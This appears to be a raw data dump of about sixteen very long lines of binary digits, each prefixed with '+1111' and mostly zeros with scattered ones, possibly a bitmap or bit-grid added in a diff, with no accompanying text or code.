+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000001000100000000000000000000000000000000000010001010000000010000000000000000000000000000000000000000000010001000000000000000000000000000000000000000000000000000000000000000000001010110011100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000001000000000100000000000000000000000001000000000000000000000000000000100001000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000011111100111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010010000000000000000000000000000000000001000000000000000000110010001001111110001000010000110001110111101100010000000000110010001111001000011000111001111001110000001100000000000000110010000000011000000110010000000010000011001100000000000000000000000000000000000000000000000000000000000000000100001010110100100100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000100000000010000000000000000000000000011000010010000010000000000010100000000000001000100001010000000000000000000010000000000000000100100100000000100000001000000000000000000000000000000000000000000000000000000000000000000000000000000000010000100010010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000010001000000100000000000000001001000110000100000000000000000010001001100000101000000000100010000000000010000000000000000100000000000000000010000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000101001001001000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000001000000000000000000000000010000000011000000000110000011000000000000000000000000010000000000000000000000001000000000001000000100000000000000000100000000000000000000000000000000000011000100000000000000000000000000000000000000000000000000000000000000100000001000011100101000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000000000000000000000000000000000000000000000000000000100100000000000000000000000000000100000000011000000010011110100100001100000000011011100001000000001100011101000000000110000000001111110000110100100000100010001110000001000100100000000000011000100000000000000000000000000000000000000000000000011010000000000000000000000000000000000000000000011000010101001000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000100001000000010010000000100000010000000010000000000000000000000000000000100000000000000001000000000000000000000000000000000100000000000000001001000010000000000000000000000000000000000000000000000001000000000000000000000000000000000000000010000000010110000010111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000010010000000000000000000000000000100000001000010010000000000000000000010000100110000000110000000000001001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010100011011001111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000100000000000000000010000000000010001010000000000000001000000000000000100000000010000010000100000000001000010001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001100111101110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000100000000000000000000000000011000011000000000100000000100100000001100000000001100001000100100111100000000110000000001100110011111000000000000000010000000010000000000000000000011001101100010000000000000000000000000000000000000000000000000000000000000000000000111110110100010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011001000000000010000000000000000000010000000000001000000000001000000000000000000000011000000001010000000000000000000000000100000000000000000000101000000000001000000000000000000000000000000000000000000000000000000000000001000001010101001000101111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000110000000000010000000000000100010000110100000000010000000000000000000100010000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001101001101011001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000100100000000100000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000011011110111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001110000100001001100100110001010000100000000011000000000000001111000000100100000001111000000111100000001100000000000000000000000000000000000000000000000000001110010010000000000000000000000000000000000000000000000000011111010011000000000000111010111100111111111111111111111111111111111111111111111111 